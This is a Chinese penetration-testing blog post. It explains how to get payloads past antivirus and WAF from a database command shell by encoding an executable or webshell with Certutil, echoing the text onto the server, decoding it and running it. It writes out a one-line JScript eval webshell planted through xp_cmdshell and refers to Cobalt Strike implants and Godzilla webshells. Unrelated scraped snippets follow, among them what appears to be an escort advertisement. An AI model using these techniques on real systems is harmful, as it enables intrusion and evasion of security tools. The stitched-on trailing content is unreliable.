各位在渗透中是否遇见过这个问题:
虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。
本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的骚操作。
话不多说,例如这样场景:在数据库连接后或者sqlmap注入连接os-shell后可执行命令:
其中包括杀软或某狗、某盾:
此时下载文件的各种命令均被拦截:
bitsadmin:
certutil证书:
还会被杀软报警:
powershell也会被彻底封杀:
尤其是某管家,拦截更彻底,根本没有倒计时自动消失(此时需要夸一下某大厂的报警提示倒计时功能)
而在这种环境下可在有权限写入的前提下尝试写入一句话木马:
xp_cmdshell 'echo? ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["bmfx"], "unsafe");%^>> D:\\WWW\\bmfx.aspx'
但也存在被某狗、WAF杀掉的可能。
此时,骚操作上场。
windows自带的证书下载,也就是上文使用但远程下载被拦截的Certutil,还可用来对文件编码解码:
本地: Certutil -encode artifact.txt artifact.exe 或指定路径: Certutil -encode d:\artifact.txt d:\artifact.exe
将txt文本使用echo命令:
echo sfAFASFAsfasgasdf………>>d:\1.txt
写入服务器后,进入txt所在目录执行解码(或直接指定物理目录文件):
Certutil -decode art.txt art.exe 或: Certutil -decode d:\art.txt d:\art.exe
后续可在命令中执行exe上线:
cmd.exe /c art.exe
重点是:本地解码编码操作不会触发杀软拦截行为!
此外,Certutil支持将任意文件编码解码,除了exe还有aspx、php、jsp等(如加密免杀的webshell,此处使用哥斯拉为例):
可在web站点写入文件后访问txt查看写入有无偏差:
还有一点,本人亲测,编码后txt中的文本类似于生成的shellcode,会自动换行显示,但本地替换换行符、自行拆分换行符,不改变内容的前提下,编码、解码前后的文件不会有任何影响。
但是在navicat等数据库软件里操作的话还有一个限制,echo的长度会提示不要过长:
此时就要看各位师傅们在bypass WaF、AV时如何减小体量了,一般cs的马bypass后会在50k左右,使用sqlmap的—os-shell执行echo不会像navicat要求128字符那么短,但也有长度限制,具体各位可亲测。
代理记账,是指会计咨询、服务机构及其他组织等经批准设立从事会计代理记账业务的中介机构接受独立核算单位的委托,代替其办理记账、算账、报账业务的一种社会性会计服务活动。 《会计法》第36条明确规定...
大家都知道,驾考科目一是理论考试,考的大多是法律法规方面的基础知识,考试题型也全为选择题,只要熟读课本或多刷题目,很容易就能过关,也是驾考所有科目中最容易的一环。而福建泉州的男子周某,5年花了10余万...
广州市绝品商务服务上门预定【褚小丽】 今日给大伙儿共享的內容是“广州市绝品商务服务上门预定【褚小丽】”,我是褚小丽,来源于房山,2020年27岁,做为岗位:别的,我喜爱我的岗位:别的。三圍:胸64腰9...
本文目录一览: 1、世界黑客排名是怎样的? 2、有什么有名气的黑客大赛大家知道的啊? 3、世界上最牛的黑客 世界黑客排名是怎样的? 世界黑客排名是:凯文·米特尼克、丹尼斯、李纳斯、沃兹尼亚克...
华为型号大全对照表(华为手机各型号排名怎样?)华为是国人最喜爱的手机品牌了,越来越多的人买手机时,也不再执着于洋品牌,而倾向于选择华为,那么,华为品牌的手机中,有哪些手机值得买,哪些手机不值得买呢...
英雄联盟5月25日更新了什么?英雄联盟在2020年5月25日进行不停机更新,本次更新主要是修复游戏内的bug,包含无限火力模式、英雄凯隐和云顶之弈模式,想了解具体更新内容的玩家,下面小编带来了lol2...